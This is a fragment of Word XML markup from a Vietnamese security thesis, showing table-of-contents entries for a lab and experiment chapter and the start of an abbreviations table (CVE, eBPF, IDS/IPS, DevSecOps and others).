            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37F5B4E0" w14:textId="4823F469"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90" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.2. Cấu trúc dịch vụ giả lập phục vụ Lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976390 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6828BA9B" w14:textId="6E6A6635"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91" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.3. Quy trình thực hiện chi tiết</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976391 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D8BC637" w14:textId="6460F3CE" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976392" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.4. Kết quả thực nghiệm đạt được</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976392 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76401A1F" w14:textId="2C64E468" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976393" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.6. Kết luận chương</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976393 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14371811" w14:textId="1D64A021"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94" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>KẾT LUẬN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976394 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20A300F2" w14:textId="50D04DBE" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976395" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 5: DANH MỤC CÁC TÀI LIỆU THAM KHẢO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976395 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="712D97FE" w14:textId="2868034E" w:rsidR="003B15FC" w:rsidRDefault="003B15FC">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1C46A110" w14:textId="77777777" w:rsidR="0099472A" w:rsidRPr="00AD11E6" w:rsidRDefault="0099472A" w:rsidP="005415E6">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4474B3CA" w14:textId="3DAD0C82" w:rsidR="0099472A" w:rsidRPr="0099472A" w:rsidRDefault="0099472A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0213DD88" w14:textId="77777777" w:rsidR="005415E6" w:rsidRDefault="005415E6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A9E9E" w14:textId="06D54F7D" w:rsidR="00864F73" w:rsidRDefault="00864F73" w:rsidP="00864F73">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00864F73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC CÁC THUẬT NGỮ, CHỮ VIẾT TẮT</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8784" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1516"/>
        <w:gridCol w:w="3015"/>
        <w:gridCol w:w="4253"/>
      </w:tblGrid>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="2B21A4D0" w14:textId="77777777" w:rsidTr="002D4461">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1516" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D9E582B" w14:textId="77777777" w:rsidR="00864F73" w:rsidRPr="00864F73" w:rsidRDefault="00864F73" w:rsidP="00864F73">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00864F73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Viết tắt </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EA94F98" w14:textId="77777777" w:rsidR="00864F73" w:rsidRPr="00864F73" w:rsidRDefault="00864F73" w:rsidP="00864F73">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00864F73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Tiếng Anh </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="405F8297" w14:textId="77777777" w:rsidR="00864F73" w:rsidRPr="00864F73" w:rsidRDefault="00864F73" w:rsidP="00864F73">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00864F73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tiếng Việt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="089A17CB"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44BC7DC1"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AI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E3125D0"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Artificial Intelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E84681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Trí tuệ nhân tạo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="31A74B3B"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1A8F8DA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API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10392CE3"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Application Programming Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C7BBA4E"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Giao diện lập trình ứng dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="001ACE1D"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79FDEAE0"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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D28886A"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Common Vulnerabilities and Exposures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="370619DC"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Danh mục lỗ hổng bảo mật phổ biến</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="087647AC"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1F61E310"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cgroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09509CF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Control Groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A2111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Nhóm kiểm soát</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="0C5CE805"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3CA83A7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CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CD7F526"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Continuous Integration / Continuous Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E4675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Tích hợp liên tục / Triển khai liên tục</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="15732E5B"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633DCDDF"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DevSecOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="550FDDD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Development, Security, and Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CBE8EA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Phát triển, Bảo mật và Vận hành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="6A81F43A"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7EC60770"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DoS / DDoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E183E3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Denial of Service / Distributed Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53186906"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Tấn công từ chối dịch vụ / Từ chối dịch vụ phân tán</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="343012B0"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1683483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eBPF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4577069B"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Extended Berkeley Packet Filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="024535D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Bộ lọc gói Berkeley mở rộng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="4CD039F6"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3349B4A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IDS / IPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DA3EC1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Intrusion Detection System / Intrusion Prevention System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04A51982" w14:textId="2E154DBE"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Hệ thống phát hiện</w:t>
            </w:r>
            <w:r w:rsidR="002D4461">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00864F73">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ngăn ngừa xâm nhập</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="746E82A0"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6B4C72DF"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JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EDFD36A"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JSON Web Token</w:t>
